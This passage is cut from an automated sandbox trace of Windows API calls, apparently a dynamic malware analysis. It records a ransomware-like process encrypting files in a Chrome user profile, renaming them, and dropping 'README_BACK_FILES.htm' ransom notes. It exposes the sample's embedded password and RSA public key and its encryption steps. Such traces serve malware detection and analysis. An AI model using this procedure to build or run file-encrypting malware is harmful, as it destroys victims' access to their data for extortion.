pdwDataLen=0x2b9c70c*=0x80) returned 1 [0265.497] CryptEncrypt (in: hKey=0x2e7ea40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77178*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e77178*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0265.498] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e77178*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e77178*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0265.502] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x1a0, lpOverlapped=0x0) returned 1 [0265.503] CryptEncrypt (in: hKey=0x2e7eb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x1a0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x1b0) returned 1 [0265.503] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x1b0, lpOverlapped=0x0) returned 1 [0265.504] CloseHandle (hObject=0x5d40) returned 1 [0265.504] CloseHandle (hObject=0x5d50) returned 1 [0265.504] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old"), bFailIfExists=0) returned 1 [0265.513] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old", dwFileAttributes=0x0) returned 1 [0265.513] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old.gsg")) returned 1 [0265.514] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.old.fuck")) returned 1 [0265.516] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0265.516] CryptDestroyKey (hKey=0x2e7eb40) returned 1 [0265.516] CryptReleaseContext (hProv=0x2e77068, dwFlags=0x0) returned 1 [0265.516] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.516] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0265.516] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.516] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\readme_back_files.htm")) returned 0xffffffff [0265.516] AreFileApisANSI () returned 1 [0265.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 148 [0265.517] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0265.518] GetFileType (hFile=0x5d4c) returned 0x1 [0265.518] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0265.525] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0265.525] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.526] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\readme_back_files.htm")) returned 0xffffffff [0265.526] AreFileApisANSI () returned 1 [0265.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0265.526] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.527] GetFileType (hFile=0x5d48) returned 0x1 [0265.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0265.537] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.537] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.537] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.538] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.538] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.538] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fc00 [0265.539] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.539] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.539] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fb00 [0265.539] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.539] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0265.540] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0265.540] GetLastError () returned 0x0 [0265.540] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico")) returned 0x20 [0265.540] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico", dwFileAttributes=0x80) returned 1 [0265.540] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.541] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0265.544] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.gsg", dwFileAttributes=0x2) returned 1 [0265.545] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e77398) returned 1 [0265.554] CryptCreateHash (in: hProv=0x2e77398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0265.554] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.554] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.554] CryptDeriveKey (in: hProv=0x2e77398, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7e9c0) returned 1 [0265.554] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----a", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.554] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0265.554] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e77310) returned 1 [0265.555] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77310, dwCertEncodingType=0x1, pInfo=0x2eb0750*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0780*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0788*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7eb40) returned 1 [0265.556] CryptEncrypt (in: hKey=0x2e7eb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0265.556] CryptEncrypt (in: hKey=0x2e7eb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77068*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e77068*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0265.556] WriteFile (in: hFile=0x5d40, lpBuffer=0x2e77068*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e77068*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0265.557] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.574] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.574] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.580] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.580] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.580] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.580] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.581] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.581] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.581] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.581] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.581] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.582] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.582] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.582] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.582] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.582] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.582] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.583] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.583] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.583] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.583] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.583] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.584] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.584] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, 